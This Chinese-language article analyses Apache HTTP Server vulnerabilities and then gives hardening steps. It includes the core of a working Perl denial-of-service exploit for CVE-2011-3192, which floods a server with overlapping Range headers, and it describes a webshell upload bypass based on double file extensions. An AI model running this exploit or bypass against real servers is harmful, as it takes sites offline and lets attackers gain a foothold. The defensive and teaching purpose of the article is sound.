Apache漏洞利用与安全加固实例分析，apache漏洞实例分析

Apache漏洞利用与安全加固实例分析，apache漏洞实例分析

Apache 作为Web应用的载体，一旦出现安全问题，那么运行在其上的Web应用的安全也无法得到保障，所以，研究Apache的漏洞与安全性非常有意义。本文将结合实例来谈谈针对Apache的漏洞利用和安全加固措施。

Apache HTTP Server（以下简称Apache）是Apache软件基金会的一个开放源码的网页服务器，可以在大多数计算机操作系统中运行，是最流行的Web服务器软件之一。虽然近年来Nginx和Lighttpd等Web Server的市场份额增长得很快，但Apache仍然是这个领域中独一无二的巨头，互联网上大多数的Web应用依然运行在Apache上。

Apache漏洞分析

Apache HTTP Server畸形Range选项处理远程拒绝服务漏洞

CVE漏洞编号：CVE-2011-3192

影响版本：Apache 2.x、Apache 1.3

漏洞描述：Apache HTTP Server在处理Range选项生成回应时存在漏洞，远程攻击者可能利用此漏洞通过发送恶意请求导致服务器失去响应，导致拒绝服务。

此漏洞源于Apache HTTP Server在处理Range头选项中包含的大量重叠范围指定命令时存在的问题，攻击者可通过发送到服务器的特制HTTTP请求耗尽系统资源，导致Apache失去响应，甚至造成操作系统资源耗尽。

漏洞利用原理：HTTP请求中的Range选项定义了资源文件的分片请求方式，一般常用于网络的断点续传功能。攻击者通过在HTTP请求的Range选项中设置大量重叠的范围指定命令，Apache在处理这样的请求时需要消耗大量的CPU和内存资源，导致Apache失去响应，甚至造成操作系统资源耗尽。这样，攻击者可以利用较小的代价实现对目标服务器的拒绝服务攻击，该漏洞利用简单，且影响范围巨大。
漏洞分析：我们先来看下攻击者构造的恶意数据包，如下图1：

图1

从上图我们可以看到攻击者在HTTP请求的Range处设置了大量重叠的范围，下面我们来看漏洞利用代码的核心部分：

/*建立进程*/

$pm = new Parallel::ForkManager($numforks);

$|=1;

srand(time());

/*默认设置分片数值为1300*/

$p = "";

for ($k=0;$k<1300;$k++) {

$p .= ",5-$k";

}

/*按用户输入的攻击次数循环执行攻击*/

for ($k=0;$k<$numforks;$k++) {

my $pid = $pm->start and next;

/*构造攻击数据包*/

my $sock = IO::Socket::INET->new(PeerAddr => $ARGV[0],

PeerPort => "80",

Proto    => 'tcp');

$p = "HEAD / HTTP/1.1\r\nHost: $ARGV[0]\r\nRange:bytes=0-$p\r\nAccept-Encoding: gzip\r\nConnection: close\r\n\r\n";

print $sock $p;

while(<$sock>) {

}

$pm->finish;

}

$pm->wait_all_children;

print ":pPpPpppPpPPppPpppPp\n";

}

OK，在了解了该漏洞的利用原理后，我们通过一个实例来检验下攻击效果。先来看目标服务器未受到攻击前的资源占用情况，如下图2：

图2

现在我们来对目标服务器发起攻击，如图3。从图4中可以看到CPU和内存占用率飙升。

图3

图4

漏洞修复：将Apache版本升级到2.2.20或以上版本。

Apache文件名解析特性

Apache对于文件名的解析是从后往前解析的，直到遇见一个它认识的文件类型为止。因此，如果web目录下存在以类似webshell.php.test这样格式命名的文件，Apache在解析时因为不认识.test这个文件类型，所以会一直往前解析，当解析到.php时，它认识了，因此会将它解析为PHP文件。

Apache的这种解析特性经常被用来绕过Web应用的文件上传检测。当Web应用的文件上传功能在检测上传文件的合法性时，如果仅通过检测上传文件的扩展名来判断文件是否合法，就可以利用Apache的这种文件名解析特征绕过Web应用的检测。

下面来看一个实例：目标网站后台存在一个上传图片的功能，只允许上传JPG和GIF图片格式的文件。但程序在验证上传文件合法性处存在漏洞，只是简单地通过上传文件扩展名来确定文件是否合法，这时我们就可以利用Apache的文件名解析特征来绕过这种检测。
将文件名修改为类似phpshell.php.jpg这样的格式上传，发现绕过了检测，文件被成功上传到目标网站，如图5。

图5

可以在httpd.conf配置文件中添加以下内容来阻止Apache解析这种文件。

<Files ~ "\.(php.)">

Order Allow,Deny

Deny from all

</Files>

修改后需要重启Apache服务生效。

这样即使攻击者上传了类似phpshell.php.jpg这样格式的文件，Apache也不会将它解析为PHP文件了，如图6。

图6

安全加固

Apache的安全加固我们主要从以下两点考虑：一是Apache Web Server本身是否安全，比如是否存在安全漏洞；二是Apache Web Server是否提供了可使用的安全功能，这部分主要是检查Apache的配置是否得当，在安全性、可用性、稳定性之间取得平衡。

Apache版本的选择与安装注意事项

检查目前使用的Apache版本是否存在安全漏洞，如果存在，需要升级到新的安全版本。在选择Apache的版本时，我们一般选择最新的稳定版本。这样可以在安全性和稳定性之间取得一个很好的平衡。从低版本升级到高版本时，建议先在测试环境中测试通过后再进行升级，以避免由于兼容性带来的问题。

在安装时使用自定义的安装路径，并配置使用自定义的WEB目录。

Apache安全配置

1. Apache降权

这个工作只针对运行在Windows平台上的Apache，因为在Windows环境下，Apache默认以System权限运行，这样的后果是一旦成功入侵WEB应用，将直接得到一个高权限的Webshell，如图7。

图7

现在我们来对Apache进行降权操作。首先新建一个用户，设置复杂的密码，并且让它不属于任何用户组，如图8。

图8

接着打开“本地安全策略”--->“本地策略”--->“用户权限分配”，找到“作为服务登录”项，把刚刚新建的用户添加进去，如图9。

图9

然后打开“服务”组件，找到Apache 的服务，右键“属性”--->“登录”，用刚新建的apache 账户运行Apache 服务，如图10。

图10

再找到Apache 日志目录，为apache 账户分配“读取”和“写入”权限，否则Apache 服务不能启动，如图11。

图11

配置好后，重启Apache 服务生效，现在Apache 服务就已apache 低权限账户运行了，如图12。

图12

Linux环境下不必关心这个问题，Apache主进程以root 权限启动，子进程默认是以apache、daemon或其他用户身份运行的，这是一个低权限用户。

2. 只加载必要的Module（模块）

Apache有很多官方与非官方的Module，很多漏洞都是由于Apache的Module造成的。所以我们需要检查Apache的Module安装情况，根据“最小权限原则”，应该尽可能地减少不必要的Module，对于要使用的Module，则检查其对应版本是否存在已知的安全漏洞。可以在httpd.conf中配置需要加载或禁用的Module。

3. Apache日志安全设置

不论在那种服务器上，日志都是一个非常重要的部分，我们需要对它严加保护。在Apache上也是如此。首先要修改日志的默认保存路径，然后设置只允许管理员有日志保存目录的完全控制权限，如图13。

图13

4. 网站目录权限配置

原则：目录有写入权限，一定不要分配执行权限；目录有执行权限，一定不要分配写入权限。

网站上传目录和数据库目录一般需要分配“写入”权限，但一定不要分配执行权限。其他目录一般只分配“读取”和“记录访问”权限即可。

5. 关闭Apache的目录浏览功能

如果Apache采用默认配置，当WEB目录下不存在默认索引页面（如index.html）时，会将当前目录下的所有文件和目录都列出来，这是十分危险的，如图14。

图14

可以通过以下两种方法来关闭目录浏览功能：

a.打开httpd.conf配置文件，查找“Options Indexes FollowSymLinks”，修改为“Options -Indexes”，然后保存并重启Apache服务生效

b.修改.htaccess文件——在.htaccess文件里加入“Options -Indexes”（没有双引号）就可以阻止目录列表的显示了。

这样以后再访问不存在默认索引页面的目录时，Apache将会返回403错误页面，如图15。

图15

6. 修改Apache默认banner信息

Apache的banner会泄露服务器的操作系统和Apache版本等相关信息，如图16和图17，而这些信息对攻击者是非常有用的，我们需要修改默认配置来阻止这些信息的泄露。

图16

图17

打开httpd.conf配置文件，找到ServerTokens和ServerSignature，将它们的值分别修改为Prod和Off，修改后的效果如下图18和图19。

图18

图19

总结

通过上面对Apache漏洞和安全加固的实例分析，相信读者对Apache HTTP Server的漏洞和安全加固都有了更加深入的认识。其实Apache的安全加固并不难，很多时候更重要的是管理员的安全意识，只要有足够的安全意识，加上上面介绍的安全加固方法，相信你一定可以打造一个安全的Apache HTTP Server。